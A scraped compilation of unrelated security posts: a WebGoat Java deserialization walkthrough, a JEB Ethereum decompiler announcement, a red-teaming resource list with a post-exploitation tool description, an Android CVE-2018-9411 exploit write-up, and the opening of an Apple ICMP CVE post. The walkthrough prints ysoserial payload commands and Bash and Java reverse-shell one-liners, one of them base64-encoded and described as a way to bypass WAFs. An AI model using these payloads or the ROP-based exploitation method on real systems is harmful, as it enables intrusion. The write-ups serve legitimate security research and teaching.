Java Deserialization — From Discovery to Reverse Shell on Limited Environments

( Original text by By Ahmed Sherif & Francesco Soncina )

n this article, we are going to show you our journey of exploiting the Insecure Deserialization vulnerability and we will take WebGoat 8 deserialization challenge (deployed on Docker) as an example. The challenge can be solved by just executing sleepfor 5 seconds. However, we are going to move further for fun and try to get a reverse shell.


The Java deserialization issue has been known in the security community for a few years. In 2015, two security researchers Chris Frohoff and Gabriel Lawrence gave a talk Marshalling Pickles in AppSecCali. Additionally, they released their payload generator tool called ysoserial.

Object serialization mainly allows developers to convert in-memory objects to binary and textual data formats for storage or transfer. However, deserializing objects from untrusted data can cause an attacker to achieve remote code execution.


As mentioned in the challenge, the vulnerable page takes a serialized Java object in Base64 format from the user input and it blindly deserializes it. We will exploit this vulnerability by providing a serialized object that triggers a Property Oriented Programming Chain (POP Chain) to achieve Remote Command Execution during the deserialization.

The WebGoat 8 Insecure Deserialization challenge

By firing up Burp and installing a plugin called Java-Deserialization-Scanner. The plugin is consisting of 2 features: one of them is for scanning and the other one is for generating the exploit based on the ysoserial tool.

Java Deserialization Scanner Plugin for Burp Suite

After scanning the remote endpoint the Burp plugin will report:

Hibernate 5 (Sleep): Potentially VULNERABLE!!!

Sounds great!


Let’s move to the next step and go to the exploitation tab to achieve arbitrary command execution.

Huh?! It seems an issue with ysoserial. Let’s dig deeper into the issue and move to the console to see what is the issue exactly.

Error in payload generation

By looking at ysoserial, we see that two different POP chains are available for Hibernate. By using those payloads we figure out that none of them is being executed on the target system.

Available payloads in ysoserial

How the plugin generated this payload to trigger the sleep command then?

We decided to look at the source code of the plugin on the following link:

We noticed that the payload is hard-coded in the plugin’s source code, so we need to find a way to generate the same payload in order to get it working.

The payload is hard-coded.

Based on some research and help, we figured out that we need to modify the current version of ysoserial in order to get our payloads working.

We downloaded the source code of ysoserial and decided to recompile it using Hibernate 5. In order to successfully build ysoserial with Hibernate 5 we need to add the javax.el package to the pom.xml file.

We also have sent out a Pull Request to the original project in order to fix the build when the hibernate5 profile is selected.

Updated pom.xml

We can proceed to rebuild ysoserial with the following command:

mvn clean package -DskipTests -Dhibernate5

and then we can generate the payload with:

java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/test" | base64 -w0
Working payload for Hibernate 5

We can verify that our command was executed by accessing the docker container with the following command:

docker exec -it <CONTAINER_ID> /bin/bash

As we can see our payload was successfully executed on the machine!

The exploit works!

We proceed to enumerate the binaries on the target machine.

webgoat@1d142ccc69ec:/$ which php
webgoat@1d142ccc69ec:/$ which python
webgoat@1d142ccc69ec:/$ which python3
webgoat@1d142ccc69ec:/$ which wget
webgoat@1d142ccc69ec:/$ which curl
webgoat@1d142ccc69ec:/$ which nc
webgoat@1d142ccc69ec:/$ which perl
webgoat@1d142ccc69ec:/$ which bash

Only Perl and Bash are available. Let’s try to craft a payload to send us a reverse shell.

We looked at some one-liners reverse shells on Pentest Monkeys:

And decided to try the Bash reverse shell:

bash -i >& /dev/tcp/ 0>&1

However, as you might know, that java.lang.Runtime.exec()has some limitations. The shell operators such as redirection or piping are not supported.

We decided to move forward with another option, which is a reverse shell written in Java. We are going to modify the source code on the to generate a reverse shell payload.

The following path is the one which we need to modify:

/root/ysoserial/src/main/java/ysoserial/payloads/util/ from line 116 to 118.

The following Java reverse shell is mentioned on Pentest Monkeys which still didn’t work:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

After some play around with the code we ended up with the following:

String cmd = "java.lang.Runtime.getRuntime().exec(new String []{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"}).waitFor();";

Let’s rebuild ysoserial again and test the generated payload.

Generating the weaponized payload with a Bash reverse shell

And.. we got a reverse shell back!


Generalizing the payload generation process

During our research we found out this encoder as well that does the job for us ‘

By providing the following Bash reverse shell:

bash -i >& /dev/tcp/[IP address]/[port] 0>&1

the generated payload will be:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}

Awesome! This encoder can also be useful for bypassing WAFs! 🚀

Special thanks to Federico Dotta and Mahmoud ElMorabea!



( Original text by  )

We’re very excited to announce that the pre-release of our Ethereum smart contract decompiler is available. We hope that it will become a tool of choice for security auditors, vulnerability researchers, and reverse engineers examining opaque smart contracts running on Ethereum platforms.

TL;DR: Download the demo build and start reversing contracts

Keep on reading to learn about the current features of the decompiler; how to use it and understand its output; its current limitations, and planned additions.

This opaque multisig wallet is holding more than USD $22 million as of 10/26/2018 (on mainnet, address 0x3DBB3E8A5B1E9DF522A441FFB8464F57798714B1)

Overall decompiler features

The decompiler modules provide the following specific capabilities:

  • The decompiler takes compiled smart contract EVM 1 code as input, and decompiles them to Solidity-like source code.
  • The initial EVM code analysis passes determine contract’s public and private methods, including implementations of public methods synthetically generated by compilers.
  • Code analysis attempts to determine method and event names and prototypes, without access to an ABI.
  • The decompiler also attempts to recover various high-level constructs, including:
    • Implementations of well-known interfaces, such as ERC20 for standard tokens, ERC721 for non-fungible tokens, MultiSigWallet contracts, etc.
    • Storage variables and types
    • High-level Solidity artifacts and idioms, including:
      • Function mutability attributes
      • Function payability state
      • Event emission, including event name
      • Invocations of address.send() or address.transfer()
      • Precompiled contracts invocations

On top of the above, the JEB back-end and client platform provide the following standard functionality:

  • The decompiler uses JEB’s optimizations pipeline to produce high-level clean code.
  • It uses JEB code analysis core features, and therefore permits: code refactoring (eg, consistently renaming methods or fields), commenting and annotating, navigating (eg, cross references), typing, graphing, etc.
  • Users have access to the intermediate-level IR representation as well as high-level AST representations though the JEB API.
  • More generally, the API allows power-users to write extensions, ranging from simple scripts in Python to complex plugins in Java.

Our Ethereum modules were tested on thousands of smart contracts active on Ethereum mainnet and testnets.

Basic usage

Open a contract via the “File, Open smart contract…” menu entry.

You will be offered two options:

  • Open a binary file already stored on disk
  • Download 2 and open a contract from one of the principal Ethereum networks: mainnetrinkebyropsten, or kovan:
    • Select the network
    • Provide the contract 20-byte address
    • Click Download and select a file destination
Open a contract via the File, Open smart contract menu entry

Note that to be recognized as EVM code, a file must:

  • either have a “.evm-bytecode” extension: in this case, the file may contain binary or hex-encoded code;
  • or have be a “.runtime” or “.bin-runtime” extension (as generated by the solc Solidity compiler), and contain hex-encoded Solidity generated code.

If you are opening raw files, we recommend you append the “.evm-extension” to them in order to guarantee that they will be processed as EVM contract code.

Contract Processing

JEB will process your contract file and generate a DecompiledContract class item to represent it:

The Assembly view on the right panel shows the processed code.

To switch to the decompiled view, select the “Decompiled Contract” node in the Hierarchy view, and press TAB (or right-click, Decompile).

Right-click on items to bring up context menus showing the principal commands and shortcuts.
The decompiled view of a contract.

The decompiled contract is rendered in Solidity-like code: it is mostly Solidity code, but not entirely; constructs that are illegal in Solidity are used throughout the code to represent instructions that the decompiler could not represent otherwise. Examples include: low-level statements representing some low-level EVM instructions, memory accesses, or very rarely, goto statements. Do not expect a DecompiledContract to be easily recompiled.

Code views

You may adjust the View panels to have side-by-side views if you wish to navigate the assembly and high-level code at the same time.

  • In the assembly view, within a routine, press Space to visualize its control flow graph.
  • To navigate from assembly to source, and back, press the TAB key. The caret will be positioned on the closest matching instruction.
Side by side views: assembly and source

Contract information

In the Project Explorer panel, double click the contract node (the node with the official Ethereum Foundation logo), and then select the Description tab in the opened view to see interesting information about the processed contract, such as:

  • The detected compiler and/or its version (currently supported are variants of Solidity and Vyper compilers).
  • The list of detected routines (private and public, with their hashes).
  • The Swarm hash of the metadata file, if any.
The contract was identified as being compiled with Solidity <= 0.4.21


The usual commands can be used to refactor and annotate the assembly or decompiled code. You will find the exhaustive list in the Action and Native menus. Here are basic commands:

  • Rename items (methods, variables, globals, …) using the N key
  • Navigate the code by examining cross-references, using the X key (eg, find all callers of a method and jump to one of them)
  • Comment using the Slash key
  • As said earlier, the TAB key is useful to navigate back and forth from the low-level EVM code to high-level decompiled code

We recommend you to browser the general user manual to get up to speed on how to use JEB.

Rename an item (eg, a variable) by pressing the N key

Remember that you can change immediate number bases and rendering by using the B key. In the example below, you can see a couple of strings present in the bad Fomo3D contract, initially rendered in Hex:

All immediates are rendered as hex-strings by default.
Use the B key to cycle through base (10, 16, etc.) and rendering (number, ascii)

Understanding decompiled contracts

This section highlights idioms you will encounter throughout decompiled pseudo-Solidity code. The examples below show the JEB UI Client with an assembly on the left side, and high level decompiled code on the right side. The contracts used as examples are live contracts currently active Ethereum mainnet.

We also highlight current limitations and planned additions.

Dispatcher and public functions

The entry-point function of a contract, at address 0, is generally its dispatcher. It is named start() by JEB, and in most cases will consist in an if-statement comparing the input calldata hash (the first 4 bytes) to pre-calculated hashes, to determine which routine is to be executed.

  • JEB attempts to determine public method names by using a hash dictionary (currently containing more than 140,000 entries).
  • Contracts compiled by Solidity generally use synthetic (compiler generated) methods as bridges between public routines, that use the public Ethereum ABI, and internal routines, using a compiler-specific ABI. Those routines are identified as well and, if their corresponding public method was named, will be assigned a similar name __impl_{PUBLIC_NAME}.

NOTE/PLANNED ADDITION: currently, JEB does not attempt to process input data of public routines and massage it back into an explicit prototype with regular variables. Therefore, you will see low-level access to CALLDATA bytes within public methods.

A dispatcher.

Below, see the public method collectToken(), which is retrieving its first parameter – a 20 byte address – from the calldata.

A public method reading its arguments from CALLDATA bytes.

Interface discovery

At the time of writing, implementation of the following interfaces can be detected: ERC20, ERC165, ERC721, ERC721TokenReceiver, ERC721Metadata, ERC721Enumerable, ERC820, ERC223, ERC777, TokenFallback used by ERC223/ERC777 interfaces, as well as the common MultiSigWallet interface.

Eg, the contract below was identified as an ERC20 token implementation:

This contract implements all methods specified by the ERC20 interface.

Function attributes

JEB does its best to retrieve:

  • low-level state mutability attributes (pure, read-only, read-write)
  • the high-level Solidity ‘payable’ attribute, reserved for public methods

Explicitly non-payable functions have lower-level synthetic stubs that verify that no Ether is being received. They REVERT if it is is the case. If JEB decides to remove this stub, the function will always have an inline comment /* non payable */ to avoid any ambiguity.

The contract below shows two public methods, one has a default mutability state (non-payable); the other one is payable. (Note that the hash 0xFF03AD56 was not resolved, therefore the name of the method is unknown and was set to sub_AF; you may also see a call to the collect()’s bridge function __impl_collect(), as was mentioned in the previous section).

Two public methods, one is payable, the other is not and will revert if it receives Ether.

Storage variables

The pre-release decompiler ships with a limited storage reconstructor module.

  • Accesses to primitives (int8 to int256, uint8 to uint256) is reconstructed in most cases
  • Packed small primitives in storage words are extracted (eg, a 256-bit storage word containing 2x uint8 and 1x int32, and accessed as such throughout the code, will yield 3 contract variables, as one would expect to see in a Solidity contract
Four primitive storage variables were reconstructed.

However, currently, accesses to complex storage variables, such as mappings, mappings of mappings, mappings of structures, etc. are not simplified. This limitation will be addressed in the full release.

When a storage variable is not resolved, you will see simple “storage[…]” assignments, such as:

Unresolved storage assignment, here, to a mapping.

Due to how storage on Ethereum is designed (a key-value store of uint256 to uint256), Solidity internally uses a two-or-more indirection level for computing actual storage keys. Those low-level storage keys depend on the position of the high level storage variables. The KECCAK256 opcode is used to calculate intermediate and final keys. We will detail this mechanism in detail in a future blog post.

Precompiled contracts

Ethereum defines four pre-compiled contracts at addresses 1, 2, 3, 4. (Other addresses (5-8) are being reserved for additional pre-compiled contracts, but this is still at the ERC stage.)

JEB identifies CALLs that will eventually lead to pre-compiled code execution, and marks them as such in decompiled code: call_{specific}.

The example below shows the __impl_Receive (named recovered) method of the 34C3 CTF contract, which calls into address #2, a pre-compiled contract providing a fast implementation of SHA-256.

This contract calls address 2 to calculate the SHA-256 of a binary blob.

Ether send()

Solidity’s send can be translated into a lower-level call with a standard gas stipend and zero parameters. It is essentially used to send Ether to a contract through the target contract fallback function.

NOTE: Currently, JEB renders them as send(address, amount) instead of address.send(amount)

The contract below is live on mainnet. It is a simple forwarder, that does not store ether: it forwards the received amount to another contract.

This contract makes use of address.send(…) to send Ether

Ether transfer()

Solidity’s transfer is an even higher-level variant of send that checks and REVERTs with data if CALL failed. JEB identifies those calls as well.

NOTE: Currently, JEB renders them as transfer(address, amount) instead of address.transfer(amount)

This contract makes use of address.transfer(…) to send Ether

Event emission

JEB attempts to partially reconstruct LOGx (x in 1..4) opcodes back into high-level Solidity “emit Event(…)”. The event name is resolved by reversing the Event method prototype hash. At the time of writing, our dictionary contains more than 20,000 entries.

If JEB cannot reverse a LOGx instruction, or if LOG0 is used, then a lower-level log(…) call will be used.

NOTE: currently, the event parameters are not processed; therefore, the emit construct used in the decompiled code has the following form: emit Event(memory, size[, topic2[, topic3[, topic4]]]). topic1 is always used to store the event prototype hash.

An Invocation of LOG4 reversed to an “emit Deposit(…)” event emission


JEB API allows automation of complex or repetitive tasks. Back-end plugins or complex scripts can be written in Python or Java. The API update that ship with JEB 3.0-beta.6 allow users to query decompiled contract code:

  • access to the intermediate representation (IR)
  • access to the final Solidity-like representation (AST)

API use is out-of-scope here. We will provide examples either in a subsequent blog post or on our public GitHub repository.


As said in the introduction, if you are reverse engineering opaque contracts (that is, most contracts on Ethereum’s mainnet), we believe you will find JEB useful.

You may give a try to the pre-release by downloading the demo here. Please let us know your feedback: we are planning a full release before the end of the year.

As always, thank you to all our users and supporters. -Nicolas

  1. EVM: Ethereum Virtual Machine 
  2. This Open plugin uses Etherscan to retrieve the contract code 

List of Awesome Red Teaming Resources

Awesome Red Teaming

Картинки по запросу Red Teaming


List of Awesome Red Team / Red Teaming Resources

This list is for anyone wishing to learn about Red Teaming but do not have a starting point.

Anyway, this is a living resources and will update regularly with latest Adversarial Tactics and Techniques based on Mitre ATT&CK

You can help by sending Pull Requests to add more information.

Table of Contents

 Initial Access



 Privilege Escalation

User Account Control Bypass


 Defense Evasion

 Credential Access


 Lateral Movement



 Command and Control

Domain Fronting

Connection Proxy

Web Services

Application Layer Protocol


 Embedded and Peripheral Devices Hacking


 RedTeam Gadgets

Network Implants

Wifi Auditing


Software Defined Radio — SDR



 Training ( Free )



Remote Recon and Collection

GitHub link

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host, without having to expose your complete toolkit/agent. Often times as operator’s we need to compromise a host, just so we can keylog or screenshot (or some other miniscule task) against a person/host of interest. Why should you have to push over beacon, empire, innuendo, meterpreter, or a custom RAT to the target? This increases the footprint that you have in the target environment, exposes functionality in your agent, and most likely your C2 infrastructure. An alternative would be to deploy a secondary agent to targets of interest and collect intelligence. Then store this data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you’ve collected, but nothing more. Below is a visual representation of how I imagine an adversary would utilize this.

Remote Recon

RemoteRecon utilizes the registry for data storage, with WMI as an internal C2 channel. All commands are executed in a asynchronous, push and pull manner. Meaning that you will send commands via the powershell controller and then retrieve the results of that command via the registry. All results will be displayed in the local console.

Current Capabilities



Token Impersonation

Inject ReflectiveDll (Must Export the ReflectiveLoader function from Stephen Fewer)

Inject Shellcode


Improvements, Additions, ToDo’s:

Dynamically Load and execute .NET assemblies

Support non reflective dll’s for injection

Build Dependecies

The RemoteRecon.ps1 script already contains a fully weaponized JS payload for the Agent. The payload will only be updated as the code base changes.

If you wish to make changes to the codebase on your own, there are a few depencies required.

  1. Visual Studio 2015+
  2. Windows 7 and .NET SDK
  3. Windows 8.1 SDK
  4. mscorlib.tlh (This is included in the project but there are instances where intellisense can’t seem to find it [shrug])
  5. .NET 3.5 & 4
  6. James Forshaw’s DotNetToJScript project
  7. Fody/Costura Nuget package. Package and embed any extra dependencies in .NET.


Thanks to these individuals for their contributions via code or knowledge 🙂






For a short setup guide, please visit the wiki

CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services

( Original text by Tamir Zahavi-Brunner )

Картинки по запросу android

As part of our platform research in Zimperium zLabs, I have recently discloseda a critical vulnerability affecting multiple high-privileged Android services to Google. Google designated it as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), including additional patches in the September security update (2018-09-01 patch level).

I also wrote a proof-of-concept exploit for this vulnerability, demonstrating how it can be used in order to elevate permissions from the context of a regular unprivileged app.

In this blog post, I will cover the technical details of the vulnerability and the exploit. I will start by explaining some background information related to the vulnerability, followed by the details of the vulnerability itself. I will then describe why I chose a particular service as the target for the exploit over other services that are affected by the vulnerability. I will also analyze the service itself in relation to the vulnerability. Lastly, I will cover the details of the exploit I wrote.

Project Treble

Project Treble introduces plenty of changes to how Android operates internally. One massive change is the split of many system services. Previously, services contained both AOSP (Android Open Source Project) and vendor code. After Project Treble, these services were all split into one AOSP service and one or more vendor services, called HAL services. For more background information, the separation between services is described more thoroughly in my BSidesLV talk and in my previous blog post.


The separation of Project Treble introduces an increment in the overall number of IPC (inter-process communication); data which was previously passed in the same process between AOSP and vendor code must now pass through IPC between AOSP and HAL services. As most IPC in Android goes through Binder, Google decided that the new IPC should do so as well.

But simply using the existing Binder code was not enough, Google also decided to perform some modifications. First, they introduced multiple Binder domains in order to separate between this new type of IPC and others. More importantly, they introduced HIDL – a whole new format for the data passed through Binder IPC. This new format is supported by a new set of libraries, and is dedicated to the new Binder domain for IPC between AOSP and HAL services. Other Binder domains still use the old format.

The operation of the new HIDL format compared to the old one is a bit like layers. The underlying layer in both cases is the Binder kernel driver, but the top layer is different. For communication between HAL and AOSP services, the new set of libraries is used; for other types of communication, the old set of libraries is used. Both sets of libraries contain very similar code, to the point that some of the original code was even copied to the new HIDL libraries (although personally I could not find a good reason for copy-pasting code here, which is generally not a good practice). The usage of each of these libraries is not exactly the same (you cannot simply substitute one with another), but it is still very similar.

Both sets of libraries represent data that transfers in Binder transactions as C++ objects. This means that HIDL introduces its own new implementation for many types of objects, from relatively simple ones like objects that represent strings to more complex implementations like file descriptors or references to other services.

Sharing memory

One important aspect of Binder IPC is the use of shared memory. In order to maintain simplicity and good performance, Binder limits each transaction to a maximum size of 1MB. For situations where processes wish to share larger amounts of data between each other through Binder, shared memory is used.

In order to share memory through Binder, processes utilize Binder’s feature of sharing file descriptors. The fact that file descriptors can be mapped to memory using mmap allows multiple processes to share the same memory region by sharing a file descriptor. One issue here with regular Linux (non-Android) is that file descriptors are normally backed by files; what if processes want to share anonymous memory regions? For that reason, Android has ashmem, which allows processes to allocate memory to back file descriptors without an actual file involved.

Sharing memory through Binder is an example of different implementations between HIDL and the old set of libraries. In both cases the eventual actions are the same: one process maps an ashmem file descriptor in its memory space, transfers that file descriptor to another process through Binder and then that other process maps it in its own memory space. But the implementations for the objects which handle this are different.

In HIDL’s case, an important object for sharing memory is hidl_memory. As described in the source code: “hidl_memory is a structure that can be used to transfer pieces of shared memory between processes”.

The vulnerability

Let’s take a closer look at hidl_memory by looking at its members:

Snippet from system/libhidl/base/include/hidl/HidlSupport.h (source)
  • mHandle – a handle, which is a HIDL object that holds file descriptors (only one file descriptor in this case).
  • mSize – the size of the memory to be shared.
  • mName – supposed to represent the type of memory, but only the ashmem type is really relevant here.

When transferring structures like this through Binder in HIDL, complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data, while simple types (like integers) are transferred “as is”. This means that the size is transferred as a 64 bit integer. On the other hand, in the old set of libraries, a 32 bit integer is used.

This seems rather strange, why should the size of the memory be 64 bit? First of all, why not do the same as in the old set of libraries? But more importantly, how would a 32 bit process handle this? Let’s check this by taking a look at the code which maps a hidl_memory object (for the ashmem type):

Snippet from system/libhidl/transport/memory/1.0/default/AshmemMapper.cpp (source)

Interesting! Nothing about 32 bit processes, and not even a mention that the size is 64 bit.

So what happens here? The type of the length field in mmap’s signature is size_t, which means that its bitness matches the bitness of the process. In 64 bit processes there are no issues, everything is simply 64 bit. In 32 bit processes on the other hand, the size is truncated to 32 bit, so only the lower 32 bits are used.

This means that if a 32 bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actual mapped memory region will be much smaller. For instance, for a hidl_memory with a size of 0x100001000, the size of the memory region will only be 0x1000. In this scenario, if the 32 bit process performs bounds checks based on the hidl_memory size, they will hopelessly fail, as they will falsely indicate that the memory region spans over more than the entire memory space. This is the vulnerability!

Finding a target

We have a vulnerability; let’s now try to find a target. We are looking for a HAL service which meets the following criteria:

  1. Compiles to 32 bit.
  2. Receives shared memory as input.
  3. When performing bounds check on the shared memory, does not truncate the size as well. For example, the following code is not vulnerable, as it performs bounds check on a truncated size_t:

These are the essential requirements for this vulnerability, but there are some more optional ones which I think make for a more interesting target:

  1. Has a default implementation in AOSP. While ultimately vendors are in charge of all HAL services, AOSP does contain default implementations for some, which vendors can use. I found that in many cases when such implementation exists, vendors are reluctant to modify it and end up simply using it as is. This makes such a target more interesting, as it can be relevant in multiple vendor, as opposed to a vendor-specific service.

One thing you should note is that even though HAL services are supposed to only be accessible by other system services, this is not really the truth. There are a select few HAL services which are in fact accessible by regular unprivileged apps, each for its own reason. Therefore, the last requirement for the target is:

  1. Directly accessible from an unprivileged app. Otherwise this makes everything a bit hypothetical, as we will be talking about a target which is only accessible in case you already compromise another service.

Luckily, there is one HAL service which meets all these requirements: android.hardware.cas, AKA MediaCasService.


CAS stands for Conditional Access System. CAS in itself is mostly out of the scope of this blog post, but in general, it is similar to DRM (so much so that the differences are not always clear). Simplistically, it functions in the same way as DRM – there is encrypted data which needs to be decrypted.


First and foremost, MediaCasService indeed allows apps to decrypt encrypted data. If you read my previous blog post, which dealt with a vulnerability in a service called MediaDrmServer, you might notice that there is a reason for the comparison with DRM. MediaCasService is extremely similar to MediaDrmServer (the service in charge of decrypting DRM media), from its API to the way it operates internally.

A slight change from MediaDrmServer is the terminology: instead of decrypt, the API is called descramble (although they do end up calling it decrypt internally as well).

Let’s take a look at how the descramble method operates (note that I am omitting some minor parts here in order to simplify things):

Unsurprisingly, data is shared over shared memory. There is a buffer indicating where the relevant part of the shared memory is (called srcBuffer, but is relevant for both source and destination). On this buffer, there are offsets to where the service reads the source data from and where it writes the destination data to. It is possible to indicate that the source data is in fact clear and not encrypted, in which case the service will simply copy data from source to destination without modifying it.

This looks great for the vulnerability! At least if the service only uses the hidl_memory size in order to verify that it all fits inside the shared memory, and not other parameters. In that case, by letting the service believe that our small memory region spans over its entire memory space, we could circumvent the bounds checks and put the source and destination offsets anywhere we like. This should give us full read+write access to the service memory, as we could read from anywhere to our shared memory and write from our shared memory to anywhere. Note that negative offsets should also work here, as even 0xFFFFFFFF (-1) would be less than the hidl_memory size.

Let’s verify that this is indeed the case by looking at descramble’s code. Quick note: the function validateRangeForSize simply checks that “first_param + second_param <= third_param” while minding possible overflows.

Snippet from hardware/interfaces/cas/1.0/default/DescramblerImpl.cpp (source)

As you can see, the code checks that srcBuffer lies inside the shared memory based on the hidl_memory size. After this the hidl_memory is not used anymore and the rest of the checks are performed against srcBuffer itself. Perfect! All we need then in order to achieve full read+write access is to use the vulnerability and then set srcBuffer’s size to more than 0xFFFFFFFF. This way, any value for the source and destination offsets would be valid.

Using the vulnerability for out-of-bounds read


Using the vulnerability for out-of-bounds write

The TEE device

Before writing an exploit using this (very good) primitive, let’s think about what we really want this exploit to achieve. A look at the SELinux rules for this service shows that it is in fact heavily restricted and does not have a lot of permissions. Still, it has one interesting permission that a regular unprivileged app does not have: access to the TEE (Trusted Execution Environment) device.

This permission is extremely interesting as it lets an attacker access a wide variety of things: different device drivers for different vendors, different TrustZone operating systems and a large amount of trustlets. In my previous blog post, I have already discussed how dangerous this permission can be.

While there are indeed many things you can do with access to the TEE device, at this point I merely wanted to prove that I could get this access. Hence, my objective was to perform a simple operation which requires access to the TEE device. In the Qualcomm TEE device driver, there is a fairly simple ioctl which queries for the version of the QSEOS running on the device. Therefore, my target when building the exploit for MediaCasService was to run this ioctl and get its result.

The exploit

Note: My exploit is for a specific device and build – Pixel 2 with the May 2018 security update (build fingerprint: “google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys”). A link to the full exploit code is available at the end of the blog post.

So far we have full read+write over the target process memory. While this is a great primitive, there are two issues that need to be solved:

  • ASLR – while we do have full read access, it is only relative to where our shared memory was mapped; we do not know where it is compared to other data in memory. Ideally, we would like to find the address of the shared memory as well as addresses of other interesting data.
  • For each execution of the vulnerability, the shared memory gets mapped and then unmapped after the operation. There is no guarantee that the shared memory will get mapped in the same location each time; it is entirely possible that another memory region will take its place between executions.

Let’s take a look at some of the memory maps of the linker in the service memory space for this specific build:

As you can see, the linker happens to create a small gap of 2 memory pages (0x2000) between linker_alloc_small_objects and linker_alloc. The addresses for these memory maps are relatively high; all libraries loaded by this process are mapped to lower addresses. This means that this gap is the highest gap in memory. Since mmap’s behavior is to try to map to high addresses before low addresses, any attempt to map a memory region of 2 pages or less should be mapped in this gap. Luckily, the service does not normally map anything so small, which means that this gap should stay there. This solves our second issue, as this is a deterministic location in memory where our shared memory will always be mapped.

Let’s look at the data in the linker_alloc straight after the gap:

The linker data in here happens to be extremely helpful for us; it contains addresses which can easily indicate the address of the linker_alloc memory region. Since the vulnerability gives us relative read, and we already concluded that our shared memory will be mapped straight before this linker_alloc, we can use it in order to determine the address of the shared memory. If we take the address at offset 0x40 and reduce it by 0x10, we get the linker_alloc address. Reducing it by the size of the shared memory itself will result in the shared memory address.

So far we solved the second issue, but have only partially solved the first issue. We do have the address of our shared memory, but not of other interesting data. But what other data are we interested in?

Hijacking a thread

One part of the MediaCasService API is the ability for clients to provide listeners to events. If a client provides a listener, it will be notified when different CAS events occur. A client can also trigger events by its own, which will then be sent back to the listener. The way this works through Binder and HIDL is that when the service sends an event to the listener, it will wait until the listener finished processing the event; a thread will be blocked waiting for the listener.

Flow of triggering an event

This is great for us; we can cause a thread in the service to be blocked waiting for us, in a known pre-determined thread. Once we have a thread in this state, we can modify its stack in order to hijack it; then only after we finish, we can resume the thread by finishing to process the event. But how do we find the thread stack in memory?

As our deterministic shared memory address is so high, the distance between that address and possible locations of the blocked thread stack is big. The effect of ASLR makes it too unreliable to try to find the thread stack relatively from our deterministic address, so we use another approach. We try to use a bigger shared memory and have it mapped before the blocked thread stack, so we will be able to reach it relatively through the vulnerability.

Instead of only getting one thread to that blocked state, we get multiple (5) threads. This causes more threads to be created, with more thread stacks allocated. By doing this, if there are a few thread-stack-sized gaps in memory, they should be filled, and at least one thread stack in a blocked thread should be mapped at a low address, without any library mapped before it (remember, mmap’s behavior is to map regions at high addresses before low addresses). Then, ideally, if we use a large shared memory, it should be mapped before that.

MediaCasService memory map after filling gaps and mapping our shared memory

One drawback is that there is a chance that other unexpected things (like jemalloc heap) will get mapped in the middle, so the blocked thread stack won’t be where we expect it to be. There could be multiple approaches to solve this. I decided to simply crash the service (using the vulnerability in order to write to an unmapped address) and try again, as every time the service crashes it simply restarts. In any case, this scenario normally does not happen, and even when it does, one retry is usually enough.

Once our shared memory is mapped before the blocked thread stack, we use the vulnerability to read two things from the thread stack:

  • The thread stack address, using pthread metadata which lies in the same memory region after the stack itself.
  • The address where libc is mapped at in order to later build a ROP chain using both gadgets and symbols in libc (libc has enough gadgets). We do this by reading a return address to a specific point in libc, which is in the thread stack.

Data read from thread stack

From now on, we can read and write to the thread stack using the vulnerability. We have both the address of the deterministic shared memory location and the address of the thread stack, so by using the difference between the addresses we can reach the thread stack from our shared memory (the small one with deterministic location).

ROP chain

We have full access to a blocked thread stack which we can resume, so the next step is to execute a ROP chain. We know exactly which part of the stack to overwrite with our ROP chain, as we know the exact state that the thread is blocked at. After overwriting part of the stack, we can resume the thread so the ROP chain is executed.

Unfortunately, the SELinux limitations on this process prevent us from turning this ROP chain into full arbitrary code execution. There is no execmem permission, so anonymous memory cannot be mapped as executable, and we have no control over file types which can be mapped as executable. In this case, the objective is pretty simple (running a single ioctl), so I simply wrote a ROP chain which does this. In theory, if you want to perform more complex stuff, the primitive is so strong that it should still be possible. For instance, if you want to perform complex logic based on a result of a function, you could perform multi-stage ROP: perform one ROP chain which runs that function and writes its result somewhere, read that result, perform the complex logic in your own process and then run another ROP chain based on that.

As was previously mentioned, the objective is to obtain the QSEOS version. Here is the code that is essentially performed by the ROP chain in order to do that:

stack_addr is the address of the memory region of the stack, which is simply an address that we know is writable and will not be overwritten (the stack begins from the bottom and is not close to the top), so we can write the result to that address and then read it using the vulnerability. The sleep at the end is so the thread will not crash immediately after running the ROP chain, so we can read the result.

Building the ROP chain itself is pretty straightforward. There are enough gadgets in libc to perform it and all the symbols are in libc as well, and we already have libc’s address.

After we are done, the process is left in a bit of an unstable state, as we hijacked a thread to execute our ROP chain. In order to leave everything in a clean state, we simply crash the service using the vulnerability (by writing to an unmapped address) in order to let it restart.


As I previously discussed in my BSidesLV talk and in my previous blog post, Google claims that Project Treble benefits Android security. While that is true in many cases, this vulnerability is another example of how elements of Project Treble could lead to the opposite. This vulnerability is in a library introduced specifically as part of Project Treble, and does not exist in a previous library which does pretty much the same thing. This time, the vulnerability is in a commonly used library, so it affects many high-privileged services.

Full exploit code is available on GitHub. Note: the exploit is only provided for educational or defensive purposes; it is not intended for any malicious or offensive use.



I would like to thank Google for their quick and professional response, Adam Donenfeld (@doadam), Ori Karliner (@oriHCX), Rani Idan (@raniXCH), Ziggy (@z4ziggy) and the rest of the Zimperium zLabs team.

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
